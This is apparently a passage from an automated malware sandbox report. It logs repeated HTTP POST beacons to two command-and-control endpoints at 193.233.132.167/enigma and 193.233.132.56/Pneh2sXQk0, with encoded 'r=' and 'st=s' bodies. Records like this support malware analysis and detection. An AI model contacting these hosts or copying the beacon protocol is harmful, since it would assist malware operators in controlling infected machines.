Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 41 35 46 33 45 46 32 45 31 34 32 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA6135A5F3EF2E1422A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
